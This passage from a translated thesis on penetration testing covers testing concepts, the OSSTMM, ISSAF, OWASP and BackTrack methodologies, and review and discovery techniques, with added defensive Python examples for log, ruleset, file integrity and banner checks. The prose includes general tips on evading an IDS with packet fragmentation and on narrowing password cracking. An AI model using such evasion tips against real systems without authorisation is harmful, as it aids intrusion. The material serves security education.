TABLE OF CONTENTS
TABLE OF CONTENTS
PRESENTATION FORMAT
LIST OF ABBREVIATIONS
LIST OF TABLES
LIST OF FIGURES
INTRODUCTION
Chapter 1. OVERVIEW OF SECURITY TESTING
1.1. The concept of testing
1.2. The concept of security testing
1.3. Security testing techniques
1.3.1. Review techniques
1.3.2. Target identification and analysis techniques
1.3.3. Target vulnerability validation techniques
1.4. The concept of penetration testing
1.5. Summary of chapter 1
Chapter 2. PENETRATION TESTING METHODOLOGIES
2.1. The OSSTMM methodology
2.1.1. General concepts and terminology
2.1.2. Methodology
2.1.3. Quantitative analysis
2.1.4. Workflow
2.1.5. Conclusions on the OSSTMM methodology
2.2. The ISSAF methodology
2.2.1. Introduction
2.2.2. The ISSAF penetration testing framework
2.2.3. Conclusions on the ISSAF methodology
2.3. The OWASP methodology
2.3.1. Introduction
2.3.2. Testing principles
2.3.3. Testing techniques
2.3.4. The OWASP testing framework
2.3.5. OWASP web application penetration testing
2.3.6. Guide to writing a real risk assessment report
2.3.7. Conclusions on the OWASP methodology
2.4. The BackTrack methodology
2.4.1. Target scoping
2.4.2. Information gathering
2.4.3. Target discovery
2.4.4. Target enumeration
2.4.5. Vulnerability mapping
2.4.6. Social engineering
2.4.7. Target exploitation
2.4.8. Privilege escalation
2.4.9. Maintaining access
2.4.10. Documentation and reporting
2.4.11. Conclusions on the BackTrack methodology
2.5. Some penetration testing tools
2.6. Ethical issues for the penetration tester
2.7. Summary of chapter 2
Chapter 3. APPLYING PENETRATION TESTING TO A NETWORK SYSTEM
3.1. Introduction
3.2. The penetration testing process with BackTrack
3.3. Building a simulated network system
3.4. Penetration testing with BackTrack techniques
3.5. Reporting and evaluation
3.6. Summary of chapter 3
CONCLUSION
APPENDIX A. GLOSSARY
APPENDIX B. FORMULAS FOR CALCULATING ACTUAL SECURITY BY RAV
APPENDIX C. REFERENCES

PRESENTATION FORMAT
Times New Roman 14 pt: body text
TIMES NEW ROMAN 14 PT: abbreviations or keywords
Arial 10 pt: example commands or screen extracts
Times New Roman 12 pt: appendices
Times New Roman 14 pt: subsection titles, figure captions, formulas and software names
[x] or [ix]: index of a bibliographic reference or of an Internet reference

LIST OF ABBREVIATIONS
CNTT  Information technology (IT)
CSDL  Database
IDS  Intrusion detection system
IPS  Intrusion prevention system
ISSAF  Information systems security assessment framework
HĐH  Operating system (OS)
KTAN  Security testing
KTXN  Penetration testing
NIST  National institute of standards and technology
OSSTMM  Open source security testing methodology manual
OWASP  Open web application security project
SAN  Storage Area Network
SDLC  Software Development Life Cycle
VPN  Virtual Private Network
WASC-TC  Web application security consortium threat classification
WLAN  Wireless Local Area Network

LIST OF TABLES
Table 1: Interaction channels
Table 2: Description of the test types
Table 3: Basic quantities used in calculating actual security
Table 4: Sample illustrating a testing guide article
Table 5: Determining the risk level
Table 6: Overall likelihood table
Table 7: Overall impact table
Table 8: Overall risk severity table
Table 9: Penetration testing (KTXN) results
Table 10: Evaluation of the tools used in the penetration test
Table B-1: Formulas for the quantities used to compute SecLim_sum

LIST OF FIGURES
Figure 1: Breakdown of malware types (source: www.pandasecurity.com)
Figure 2: Classification of security testing (KTAN)
Figure 3: Overview of the OSSTMM model
Figure 4: Test types
Figure 5: Operational security testing process
Figure 6: Excel file for computing RAV
Figure 7: The single workflow (applied to all types of security test)
Figure 8: Diagram of the ISSAF penetration testing methodology
Figure 9: The exposure window of a vulnerability
Figure 10: Testing techniques applied in the SDLC phases
Figure 11: Workflow in the OWASP testing framework
Figure 12: The Integrigy software
Figure 13: Illustration of obtaining DBA privileges
Figure 14: Illustration of the BackTrack penetration testing process
Figure 15: Diagram of the simulated network
Figure 16: Vulnerability scanning with Nessus
Figure 17: Vulnerability scanning with NeXpose
Figure 18: Using a website to crack passwords

INTRODUCTION
1. Reasons for choosing the topic
Testing in general, and security testing (KTAN) in particular, is a fairly new sub-discipline of information technology (IT) in Vietnam. Until recently the field received almost no attention. There are many reasons, but the main ones are these. First, our software industry is still young and has developed in a fragmented, spontaneous way, so programmers concentrate mainly on completing a program that meets the customer's requirements as they themselves interpret them, and largely leave the responsibility for checking for defects, verifying the program's correctness and confirming that it meets its functional requirements to the customer. Second, organisations, individuals and businesses did not yet depend heavily on IT, so IT assets were of little value; an IT security threat that materialised caused no serious consequences, and the demand for information system security was therefore small.
Today, with integration into the world economy, our software industry is developing faster and becoming more industrialised. Software developers are forced to control and raise the quality of their products, both to meet the growing demands of domestic customers and to comply with the software development processes required by foreign customers. Industrialisation of software production is also unavoidable: more and more companies specialising in software testing are appearing to meet the demand for outsourcing the testing stage of software development processes, in Vietnam and worldwide.
On the other hand, with the rapid growth of the Internet and telecommunications, businesses and organisations depend more and more on this global network, and the need to protect their assets (data, IT equipment) against security breaches over the network becomes ever more urgent. Putting a piece of software into service on a system requires not only a thorough check for the defects that software may contain, but also assurance that the software itself does not compromise the security of the whole system.
Consequently, the testing team is responsible not only for checking and detecting defects, or cases where the software does not behave as its functional requirements demand, but also for security testing the software to detect risks that could compromise the security of the system.
Another direction within security testing is penetration testing (KTXN), which is security testing carried out at the highest level. Penetration testing concentrates on finding and exploiting vulnerabilities and weaknesses, proving that the security holes could be used by outsiders or malicious actors to intrude, exploit or sabotage, and at the same time assessing the extent of the loss if such an intrusion succeeded.
Moreover, security is a process carried out throughout the operating life of an information system, not just the initial security setup and configuration, and not simply an investment in new security technology. And because an organisation's assessment of its own security level is often not objective, a demand for security testing and penetration testing services arises.
The following figures give a clearer picture of the state of IT security in the world and in Vietnam. According to the latest report from Panda Labs for the second quarter of 2012:
- More than 6 million new malware samples were created in Q2 2012.
- Three quarters of the malware were Trojans.
- A new variant of the Policy virus appeared.

Figure 1: Breakdown of malware types (source: www.pandasecurity.com)
The countries most affected by malware are concentrated in Asia, with South Korea, China and Taiwan in the top three places [i26]. 78% of malware targets user data and 70% of targets are banks, showing that hackers are no longer driven by hobby but by economic gain [23]. It is estimated that companies lose about 0.5 to 2.5% of their revenue to security-related losses and downtime. From September 2009 to March 2010 the Ponemon Institute surveyed breach report data in the United States, the United Kingdom, Germany, France and Australia. The average loss among the surveyed companies was 3.425 million dollars per breach, with an average cost of 142 dollars per person. The largest threats came from dismissed employees and from attacks originating outside the company [23].
Next, some general figures on viruses and network security in Vietnam in 2011 (source: BKAV [i9]):
- 64.2 million computer infections in Vietnam were recorded for 2011 by Bkav's virus monitoring system, an average of more than 175 thousand infected computers per day.
- In 2011, 38,961 new virus strains appeared; the most widespread was W32.Sality.PE, which infected more than 4.2 million computers.
- Also in 2011, 2,245 websites of organisations in Vietnam were attacked, an average of 187 per month.
- 2012 will continue to see an explosion of mobile phone viruses.
- In 2012, if Vietnam's state apparatus for managing network security remains as incomplete as it is now, these attacks will not only continue but risk becoming uncontrollable.
In summary, with users' rising demands for software quality, their growing dependence on IT and the growing value of their IT assets, together with the increase in network attacks, the fields of security testing and penetration testing are attracting ever more attention from organisations and individuals in both research and industry. There are many related research works, and several security testing methodologies have been studied and applied in practice, such as:
- Open source security testing methodology manual (OSSTMM).
- Information systems security assessment framework (ISSAF).
- Open web application security project (OWASP).
- BackTrack testing.
With each of these methodologies, one or a set of security testing tools is introduced to support that methodology.
To guard against thieves one must think like a thief. Only by understanding how hackers think and how they target our network systems can we defend against them successfully. That is why I chose the topic: Research on penetration testing of computer network systems.
2. Research objectives and tasks
Objectives of the thesis:
- Study security testing (KTAN) techniques.
- Study penetration testing (KTXN) methodologies and techniques.
- Use the BackTrack toolkit to perform a penetration test on a simulated network system and produce a security report based on the test results for that system.
The main tasks of the thesis are:
- Study the theory of security testing.
- Study penetration testing process frameworks and their supporting tools.
- Carry out a penetration test experiment with the BackTrack toolkit.
3. Research subject and scope
The research subject comprises:
- Network security and security testing issues.
- Security testing methodologies (OSSTMM, ISSAF, OWASP and BackTrack).
- Using BackTrack 5 R1 for penetration testing.
Research scope:
- The fields of security testing and penetration testing.
4. Research method
Security for an IT system is usually understood as ensuring that the confidentiality of data, and the integrity, availability and accountability of the IT system, are not violated [8]. Security testing also uncovers the flaws and errors of a system that could violate these properties. The paradox is that penetration testing then uses and exploits exactly those flaws and errors in order to break these properties.
The thesis presents the fundamental issues around the concepts of security testing and penetration testing. It concentrates on penetration testing methodologies and analyses the strengths and weaknesses of each. It uses BackTrack, a widely used penetration testing toolkit today, to carry out an experimental penetration test against a simulated network system, in order to find weaknesses and demonstrate the harm they can cause if they are not fixed in time.
Documentary method:
- Study the theoretical basis of security and network security.
- Study and evaluate the strengths and weaknesses of the security testing methodologies (OSSTMM, ISSAF, OWASP and BackTrack).
Experimental method:
- Build a simulated network system.
- Apply one of the methodologies above (specifically BackTrack) to design and carry out a penetration test case.
- From the results of that penetration test, produce a security assessment report for the system.
5. Scientific and practical significance
Scientific significance:
- A survey of security testing and penetration testing methodologies.
- An overview of the techniques for checking and controlling the security of IT systems.
Practical significance:
- The thesis addresses the current hot topic of IT network security, and how to find and assess the vulnerabilities in an organisation's computer network, helping organisations take a more many-sided view of the safety of their IT assets.
6. Structure of the thesis
The thesis is organised into the following chapters:
Chapter 1. Overview of security testing
Chapter 1 introduces the concepts of testing, security testing (KTAN) and penetration testing (KTXN), and the security testing techniques such as review techniques, target discovery, vulnerability discovery and so on. The chapter introduces a special form of security testing, penetration testing, in which the tester takes the hacker's point of view and tries to find vulnerabilities in the system that could be exploited to sabotage or intrude. This helps the system administrator see and fix those vulnerabilities, and also see the consequences and losses that would follow if malicious actors exploited them.
Chapter 2. Penetration testing methodologies
Chapter 2 introduces the security testing methodologies, with a focus on penetration testing, that have been proposed by open communities of security experts, IT experts, managers, software developers, network administrators and others. Each methodology concentrates on a different kind of test target, and aims to give security testers a consistent and systematic way of working, thereby reducing testing time and raising productivity.
The chapter also introduces typical penetration testing tools and discusses the rules of professional ethics in penetration testing, which exist to prevent vulnerability and weakness information, or the exploitation of weaknesses, from being used for personal gain, and to require non-disclosure agreements so that sensitive information about the system does not fall into the hands of third parties.
Chapter 3. Applying penetration testing to network systems
Chapter 3 introduces the BackTrack toolkit, which is very widely used in security testing. It is a collection of applications pre-installed in the BackTrack Linux OS, which is based on the well-known Ubuntu distribution. The penetration testing techniques are based on the tools available in BackTrack.
This part builds a simulated network with ordinary network components and services as the penetration test target, designs a test plan, then uses the tools above to carry out a testing process. Finally it produces a report assessing the security status based on the test results.

Chapter 1. OVERVIEW OF SECURITY TESTING
Testing is obviously about finding defects and omissions so that they can be corrected. Security testing (KTAN) is about finding defects in an IT system (computers, network devices, services, software; hereafter simply "the system"), including the defects that can arise in the design, installation, configuration and operation of the computer network and of the services and software running on it. This chapter defines the basic concepts of testing in general and security testing in particular. Chapter 1 also presents security testing techniques such as vulnerability scanning and penetration testing (KTXN), distinguishes between them, and goes into more detail on the issues around penetration testing.
1.1. The concept of testing
The concept of testing has been defined as follows:
According to Myers [1], testing is the process of executing a program with the intent of finding errors.
Testing is the process of operating a system or component under specified conditions, observing or recording the results, and making an evaluation of the system or component [17].
Testing is described as the procedures carried out to evaluate some aspect of a piece of software [18].
Overall, testing can be regarded as the act of finding defects in order to make the software better. The usual view of a software developer is that a test which finds a defect has failed, and one which finds none has succeeded. According to Myers' definition, however, that is, from the tester's standpoint, a test that finds no defect is considered unsuccessful, and a test that finds a defect is considered successful [16]. Clearly, the developer tries to write the best possible software with no defects, while the tester tries to find the defects in the software that was written. The purpose of testing is thus to act as a counterweight to development in order to make the software better, because in practice there is no software without defects.
It is also necessary to distinguish between the two activities of testing and debugging. Testing aims to detect defects, whereas debugging is carried out once testing has detected a defect. Debugging has two steps: step 1 determines the nature of the defect and locates it in the program; step 2 corrects it.
In short, testing aims to detect defects in software (on the assumption that defects exist in the software). Testing that detects defects contributes to raising the quality of the software.
1.2. The concept of security testing
Security testing of software or of a network is a special kind of testing whose purpose is to verify and confirm whether the software or network meets its security requirements. Research on security testing accordingly divides into two directions: software security testing [18][19][22] and network security testing [3][10][11]. Software security testing is a kind of testing, carried out within the testing process, that helps determine whether the software under consideration has the security properties required by its design, based on its security requirements specification. There are two main approaches to software security testing: functional security testing and security weakness testing [19]. Functional security testing checks the software's security functions (authentication, authorisation, encryption, access control, auditing and so on) to determine whether the software operates correctly, effectively and is available as designed and developed. This kind of testing must begin in the earliest phase of the software development life cycle (SDLC), which comprises requirements gathering and analysis, design and coding, and must be maintained throughout the SDLC.
Security weakness testing (or penetration testing) acts like an attacker in order to uncover the security weaknesses of the software [19]. A software weakness here is a deficiency in the design, implementation or management of the software, for example a coding error that allows a login to the software without authentication. Software security weakness testing directly identifies and discovers system weaknesses that are not yet known and that may be caused by design deficiencies or by coding or algorithmic errors. The attack path may be over the network or local, but is mainly local. There are many methods of software security testing, listed as follows [19]: formal security testing; model-based security testing; fault injection-based security testing; fuzz testing; vulnerability scanning testing; property-based testing; white box-based security testing; risk-based security testing.
Network security testing comprises the activities that provide information on the safety and integrity of an organisation's computer network and related network devices, by verifying and confirming that the system's security conditions are all operating normally. Network security testing has two main types: vulnerability scanning [3][20][21][i10] and penetration testing [3][9][23][24]. Vulnerability scanning is the process of finding weaknesses and security holes in the network of an organisation, company or individual [20]. The basic idea of this kind of security testing is to scan every network node and the ports on each node, and then, from the information obtained, analyse and evaluate how secure the system is. The term vulnerability assessment, used in the context of vulnerability scanning, means the process of searching for known indicators of vulnerabilities inside or outside a network. This process identifies vulnerabilities so that they can be removed before a malicious program or a hacker exploits them. In most cases the vulnerabilities are known and can therefore be found. The vulnerabilities that pose a threat in a network include software bugs, unnecessary services, misconfigurations and insecure user accounts. In practice, individual vulnerabilities may carry little security risk, yet when several coexist in one system they can become a large hole that creates very high security risks. Penetration testing is therefore a component of security testing, but it goes further than vulnerability scanning: it concentrates on exploiting and abusing the vulnerabilities and weaknesses to gain unauthorised access, escalate privileges and maintain access to the target system, or on finding combinations of vulnerabilities across one or more systems that together give access to a system which is usually hard to obtain by exploiting individual weaknesses. In other words, vulnerability scanning shows that vulnerabilities exist and may analyse their risk level, but does not consider the threats that would exploit them to harm the system, whereas penetration testing is concerned with viewing the system's security problems from the attacker's point of view. Depending on the kind of network security test and the method used, the following techniques may be employed: port scanning, network mapping, vulnerability scanning, password cracking, exploitation, privilege escalation, maintaining access, virus scanning, and so on.

[Figure 2 (diagram): security testing (KTAN) branches into software security testing, which comprises functional security testing and security weakness (penetration) testing, and network security testing, which comprises vulnerability scanning and network penetration testing (KTXN).]
Figure 2: Classification of security testing (KTAN)
As the diagram in figure 2 shows, both software security testing and network security testing include penetration testing, but with different targets: the software system and the network respectively. The scope of this thesis concerns network penetration testing together with the software and services that operate on the network, referred to for short as penetration testing (KTXN).

In summary, the relationship between security and security testing is like the relationship between software development and software testing. Security research aims to build systems that meet the security criteria of confidentiality, effectiveness, availability and accountability (see the glossary for details on security), whereas security testing studies the methods and techniques for detecting security weaknesses, or the methods for compromising a security system in order to break into it, as penetration testing does. Furthermore, unlike software testing, which is usually concentrated in the development phases, security testing takes place in both the development phase and the operational (or live) phase of the system, with the main emphasis on the live phase, and must be carried out throughout the operating life of the network or software.
1.3. Security testing techniques
There are many different security testing techniques that can be used to assess the security of a system. By purpose, the technical guide to information security testing and assessment [24] divides them into three classes:
- Review techniques.
- Target identification and analysis techniques.
- Target vulnerability validation techniques.
The techniques presented below may be purely technical or non-technical, for example making a list of the physical computers in a network. Another important point is that no single technique provides complete information about a system's security, so techniques must be combined to ensure that the security testing objective is met accurately. Moreover, for any one technique there are many tools developed by many organisations and individuals, so the tester should not rely on a single tool but should run the test several times with several different tools to ensure accuracy.
1.3.1. Review techniques
Review techniques are usually used in the early stage of the security testing process. Their purpose is to examine systems passively in order to understand the system and find its security weaknesses [24]. Because most review techniques are passive, they pose little security risk to the system. The review techniques are:
Documentation review:
The documentation here means the current security policies and procedures. It gives the most basic picture of the system's security posture, yet it is often skipped during security testing. Reviewing it can reveal inconsistencies and weaknesses that may lead to a loss of security. Typical weaknesses found by documentation review are OS security procedures, or protocols and services that are no longer in use. Note that documentation review does not confirm that the security controls are implemented correctly; it only helps support the existing security infrastructure. Its results can also be used in later stages: for example, if the security policy forbids passwords shorter than 8 characters, this information can save time when cracking passwords during the penetration test.
Log review:
Log review determines whether the security controls are recording accurate information and whether the organisation complies with its log management policy. It helps confirm that the system follows the policies laid down. For example, if the security policy requires every login to critical servers to be recorded, log review shows whether this information is actually recorded as required. Log review can also uncover problems such as misconfigurations and unauthorised access or intrusion. Because most systems generate very large volumes of log data, manual log review is very time-consuming, so automated tools that considerably reduce review time and generate summary reports should be used. Such tools also allow filtering or searching for the activities of interest, making log review more effective. Common tools include event viewer, Cisco Security Monitoring, Analysis and Response System (MARS), Consul InSight, Netcool/NeuSecure, NetIQ Security Manager, Sentinel, and so on; see NIST SP 800-92, Guide to security log management [i11], for details.
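The checks the paragraph describes can be automated over a log extract. The following is an added example written for this edition, not code from the thesis: it parses constructed authentication log lines and applies three policy checks of the kind described above. The critical host list, the admin network, the failure threshold and the log format are all assumptions made for the example.

```python
import ipaddress
import re
from collections import Counter

# Assumptions for this example (constructed, not from the thesis): which servers
# count as critical and which network administrators are expected to log in from.
CRITICAL_HOSTS = {"db01", "dc01"}
ADMIN_NET = ipaddress.ip_network("10.0.5.0/24")
FAIL_THRESHOLD = 3  # failures from one source before we report it

# Constructed sample log in a simple syslog-like shape (not real data):
# "<timestamp> <host> sshd: <Accepted|Failed> user=<name> from=<ip>"
SAMPLE_LOG = """\
2012-05-01T08:00:01 db01 sshd: Accepted user=alice from=10.0.5.12
2012-05-01T08:01:10 web01 sshd: Accepted user=bob from=10.0.9.4
2012-05-01T08:02:22 db01 sshd: Failed user=root from=203.0.113.7
2012-05-01T08:02:25 db01 sshd: Failed user=root from=203.0.113.7
2012-05-01T08:02:29 db01 sshd: Failed user=admin from=203.0.113.7
2012-05-01T08:03:40 dc01 sshd: Accepted user=carol from=192.168.1.50
2012-05-01T08:04:00 dc01 sshd: Accepted user= from=10.0.5.12
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd: (?P<result>Accepted|Failed) "
    r"user=(?P<user>\S*) from=(?P<ip>\S+)$"
)


def parse(log_text):
    """Split the log into structured events; keep lines that do not parse so the
    reviewer can see where the logging control itself produces bad records."""
    events, malformed = [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
        elif line.strip():
            malformed.append(line)
    return events, malformed


def review(log_text):
    """Return (findings, malformed_lines). Each finding is a tuple whose first
    element names the policy check that fired."""
    events, malformed = parse(log_text)
    findings = []
    for e in events:
        if e["host"] not in CRITICAL_HOSTS:
            continue
        # Policy: logins to critical servers must be recorded completely.
        if not e["user"]:
            findings.append(("incomplete-record", e["host"], e["ts"]))
        # Policy: successful logins to critical servers come only from the admin network.
        if e["result"] == "Accepted" and ipaddress.ip_address(e["ip"]) not in ADMIN_NET:
            findings.append(("login-outside-admin-net", e["host"], e["ip"]))
    # Repeated failures from one source: possible password guessing or a misconfiguration.
    failures = Counter(e["ip"] for e in events if e["result"] == "Failed")
    for ip, n in failures.items():
        if n >= FAIL_THRESHOLD:
            findings.append(("repeated-failures", ip, n))
    return findings, malformed


if __name__ == "__main__":
    found, bad = review(SAMPLE_LOG)
    for f in found:
        print(*f)
    print("unparsed lines:", len(bad))
```

The `incomplete-record` finding is the one the paragraph's own example asks for: a login to a critical server that was recorded without a user name shows that the logging control exists but is not capturing accurate information. Unparsed lines are returned rather than silently dropped for the same reason.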
Ruleset review:
A ruleset is a stored collection of rules or signatures that is compared or matched against the traffic passing through a network or network device in order to decide the appropriate action, for example whether a packet is allowed through or blocked, or whether an alert is raised. Reviewing it reveals weaknesses and holes in the security devices, and also allows control over the negative effects that the rulesets have on network performance.
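Two of the defects a ruleset review looks for in a first-match firewall policy are rules that can never fire because an earlier rule already covers them (a shadowed rule is harmless if both rules take the same action, and a logic error if they differ), and allow rules that are broader than any business need. The following is an added example, not code from the thesis or from any firewall product: a constructed six-rule policy is checked for both conditions.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    """One first-match firewall rule. 'any' is accepted for src, dst, proto and dport."""
    name: str
    action: str   # "allow" or "deny"
    src: str      # CIDR or "any"
    dst: str      # CIDR or "any"
    proto: str    # "tcp", "udp" or "any"
    dport: str    # destination port as text, or "any"


def _net(spec):
    return ipaddress.ip_network("0.0.0.0/0" if spec == "any" else spec)


def covers(outer, inner):
    """True when every packet matched by `inner` would already be matched by `outer`."""
    return (_net(inner.src).subnet_of(_net(outer.src))
            and _net(inner.dst).subnet_of(_net(outer.dst))
            and outer.proto in ("any", inner.proto)
            and outer.dport in ("any", inner.dport))


def shadowed_rules(rules):
    """Rules that can never match because an earlier rule covers them.
    Returns (shadowed_name, shadowing_name) pairs. A shadowed rule whose action
    differs from the shadowing rule's is a logic error; the same action is dead weight."""
    result = []
    for i, rule in enumerate(rules):
        for earlier in rules[:i]:
            if covers(earlier, rule):
                result.append((rule.name, earlier.name))
                break
    return result


def overbroad_allows(rules):
    """Allow rules that accept any source to any destination port deserve a second look."""
    return [r.name for r in rules
            if r.action == "allow" and r.src == "any" and r.dport == "any"]


# Constructed rule list (not from the thesis) illustrating the cases above.
RULES = [
    Rule("r1-allow-web",     "allow", "any",             "192.0.2.10/32", "tcp", "80"),
    Rule("r2-deny-dmz",      "deny",  "any",             "192.0.2.0/24",  "any", "any"),
    Rule("r3-allow-ssh",     "allow", "10.0.5.0/24",     "192.0.2.10/32", "tcp", "22"),  # never reached: r2 denies first
    Rule("r4-allow-all-lan", "allow", "any",             "10.0.0.0/8",    "any", "any"),  # over-broad
    Rule("r5-allow-web-dup", "allow", "198.51.100.0/24", "192.0.2.10/32", "tcp", "80"),  # redundant with r1
    Rule("r6-deny-all",      "deny",  "any",             "any",           "any", "any"),
]

if __name__ == "__main__":
    for shadowed, by in shadowed_rules(RULES):
        print(f"{shadowed} is shadowed by {by}")
    print("over-broad allows:", overbroad_allows(RULES))
```

Here `r3-allow-ssh` is the finding that matters: the administrator intended to permit SSH from the admin network, but the broader deny above it wins, so the control behaves differently from the documented policy. `r5-allow-web-dup` only wastes an evaluation on every packet, which is the performance side of the review the paragraph mentions.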
System configuration review:
This is the process of identifying weaknesses in the configuration of the security controls. A system configuration review can expose security deficiencies such as a system that is not configured or upgraded in line with the security policy, unnecessary services or applications, and inappropriate user accounts. It can be done manually, following a security configuration guide and the recommended configuration checklist [i12]; inappropriate settings are marked and reported. There are also automated tools that collect and report security settings and supply remediation guidance where available, for example SCAP [i13]. Automated configuration review is clearly faster than manual review, but some cases still need manual checking. Both the manual and the automated methods require administrative privileges for the review (administrator on Windows, root on Unix/Linux).
Network sniffing:
This is a passive technique for monitoring traffic on the network. It involves capturing, identifying and decoding protocols and examining packet contents (both header and payload) to find information of interest. The tools used for network sniffing are called sniffers. Network sniffing is sometimes also used as a target discovery and analysis tool. In general it has little impact on the system. It is most effective when connected to a hub, a tap, or a switch's span (mirror) port. Its drawbacks are that encrypted packets cannot be read, that it only works within one network segment, and that it requires a highly skilled tester.
File integrity checking:
This detects whether files have been altered in storage or in transit by computing and storing a checksum or hash value for each file to be protected. To check integrity, the checksum or hash of the file is recomputed and compared with the stored value for that file. The advantage is that it does not need highly skilled staff to manage. The drawback is that if files change frequently, the reference data must also be updated frequently.
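The baseline-and-verify cycle just described, as an added example written for this edition and not taken from the thesis. It hashes every file under a directory with SHA-256, stores the result as a baseline, and on verification reports files that were modified, removed or added since the baseline. The `demo()` function builds a small constructed file tree in a temporary directory and tampers with it; the file names and contents in it are invented.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def file_hash(path, algo="sha256", chunk_size=65536):
    """Hash a file in chunks so large files do not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative path -> hash for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): file_hash(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify(root, baseline):
    """Recompute the hashes and report what changed since the baseline was taken."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "missing": sorted(k for k in baseline if k not in current),
        "new": sorted(k for k in current if k not in baseline),
    }


def save_baseline(baseline, path):
    Path(path).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def demo():
    """Constructed scenario: take a baseline, tamper with the tree, then verify."""
    with tempfile.TemporaryDirectory() as tree, tempfile.TemporaryDirectory() as store:
        root = Path(tree)
        (root / "etc").mkdir()
        (root / "etc" / "sshd_config").write_text("PermitRootLogin no\n")
        (root / "backup.sh").write_text("#!/bin/sh\necho backup\n")
        # The baseline is kept outside the monitored tree, on what in production
        # would be read-only or otherwise protected storage.
        baseline_path = Path(store) / "baseline.json"
        save_baseline(build_baseline(root), baseline_path)
        # Simulated tampering: a config edit, a deleted script, an unexpected new file.
        (root / "etc" / "sshd_config").write_text("PermitRootLogin yes\n")
        (root / "backup.sh").unlink()
        (root / "cron.sh").write_text("#!/bin/sh\n")
        return verify(root, load_baseline(baseline_path))


if __name__ == "__main__":
    print(demo())
```

The baseline is the weak point of this control: if it is stored where the same attacker who altered the files can rewrite it, verification proves nothing, which is why the demo keeps it outside the monitored tree. The paragraph's drawback also shows up directly: every legitimate change to a monitored file forces a new baseline.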
1.3.2. Target identification and analysis techniques
Target identification and analysis techniques concentrate on identifying devices and the ports and services associated with them, and then analysing their potential weaknesses. These techniques may be technical or non-technical [24]; an example of a non-technical technique is visual inspection to find the devices on a network. The techniques fall into the following classes:
Network discovery:
Network discovery is the technique of learning about the network and the components operating on it. There are two main approaches: passive and active. The passive approach usually uses a sniffer to monitor traffic, which yields information such as the IP addresses in use, the ports and services open on them, the OS each host is running, and the relationships between hosts. The active approach sends a few packets to the target (for example ICMP ping, SYN, FIN or NULL packets) and collects the target's responses for analysis. Active discovery is easily detected by firewalls or IDS devices, so the tester must use it carefully. The advantage of the passive approach is that it does not affect the network, since no probe packets are sent; this is exactly the drawback of the active approach, which tends to generate noise on the network. The drawbacks of the passive approach are that it takes a long time and that a device which sends nothing on the network is never detected, whereas the active approach takes less time and can be used across many different networks. With both approaches the information obtained is rarely completely accurate; to compensate, discovery should be repeated regularly and automated discovery tools should be run on a schedule. Network discovery can also uncover rogue devices and services on the network, such as rogue DHCP or DNS services.
Network port and service identification:
This technique digs deeper into the information obtained from network discovery to identify the ports and services active on the hosts and which application is running each service, for example whether port 80, used for the web service, is served by IIS or Apache. This information is very useful for selecting targets in a penetration test. All the basic tools can identify hosts and the open ports and services on them; some tools also supply further information: the OS, through a technique called OS fingerprinting; the application behind a port, through service identification, which keeps a file mapping ports to their usual services and stores the characteristic behaviour of each application for comparison with the behaviour observed on the scanned port; and the application version, through version scanning and banner grabbing, which reads the banner sent by the remote port when a connection is opened. The information obtained by these techniques is not certain, because an experienced network administrator can alter banners and other application characteristics to disguise the real application. The scanning tool should be chosen to suit the situation: some tools identify ports and services through a firewall quite well, while others do better inside the firewall. The results vary considerably with the tool used. If both internal and external scans are required, the external scan is done first. To avoid detection by an IDS, packet-level techniques such as fragmentation, aggregation, overlap and randomisation may be used to make the packets look like normal traffic. Internal testing tends toward the active approach, because this kind of scan is less likely to be detected. Internal testing also often uses modified packets, because weaknesses that require highly customised packets are easier to detect that way. This process also outlines some potential weaknesses once the application and its version number are known.
Vulnerability scanning:
This is similar to the port and service identification process, but this stage concentrates on finding weaknesses in the ports and services found. Vulnerability scanning can detect outdated software, unpatched bugs and misconfigurations. To recognise a weakness, the information found about the operating system and applications is usually compared with the weakness information held in the scanning software's vulnerability database.
Vulnerability scanning checks compliance with the security policy and the service usage policy. It also provides target information for penetration testing and helps in reinforcing weaknesses. Vulnerability scanning software can scan remotely or locally, from inside or from outside. Vulnerability scanning that simulates an attack pattern, then observes the behaviour and response of the system and compares them with the characteristic behaviour of vulnerable systems stored in a database in order to determine whether the weakness exists, is called signature-based vulnerability scanning. Vulnerability scanning tools usually assign a risk level to each weakness. The difficulty here is that individual weaknesses are usually rated low risk, but when many weaknesses exist together the risk level may be very high. In addition, different vulnerability scanners have different criteria for assessing and ranking risk levels, which is another difficulty. The rate of false detections, or false alarms, is also quite high; the tester should determine the capabilities of the scanning software and configure limits on the scan scope to reduce those rates.
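The two steps above (identifying the application and version behind each open port, then matching what was found against the scanner's vulnerability database and rating the risk) can be illustrated end to end. The following Python block is an added example written for this page, not code from the thesis or from any scanner it mentions; the service banners, the vulnerability entries (with placeholder identifiers VULN-A, VULN-B and VULN-C rather than real CVE numbers), the version thresholds and the risk scores are all constructed. It also shows the two caveats in the text: a service whose banner cannot be parsed (for example because an administrator changed it) is reported for manual verification rather than silently dropped, and several individually low-rated findings on one host combine into a high overall rating.

```python
import re
from math import prod

# Output of the port/service identification step: constructed sample data.
# The banner is the text a service sends back when a connection is opened.
DISCOVERED_SERVICES = [
    {"host": "10.0.0.5", "port": 22, "banner": "SSH-2.0-OpenSSH_7.2p2 Ubuntu"},
    {"host": "10.0.0.5", "port": 80, "banner": "Server: Apache/2.4.18 (Ubuntu)"},
    {"host": "10.0.0.7", "port": 80, "banner": "Server: Apache/2.4.54"},
    {"host": "10.0.0.7", "port": 443, "banner": ""},  # banner withheld: version unknown
]

# Constructed vulnerability database. Identifiers are placeholders, not CVE numbers;
# "fixed_in" is the first version no longer affected; "risk" is on a 0-10 scale.
VULN_DB = [
    {"id": "VULN-A", "product": "OpenSSH", "fixed_in": (7, 4), "risk": 5.0},
    {"id": "VULN-B", "product": "Apache", "fixed_in": (2, 4, 50), "risk": 3.0},
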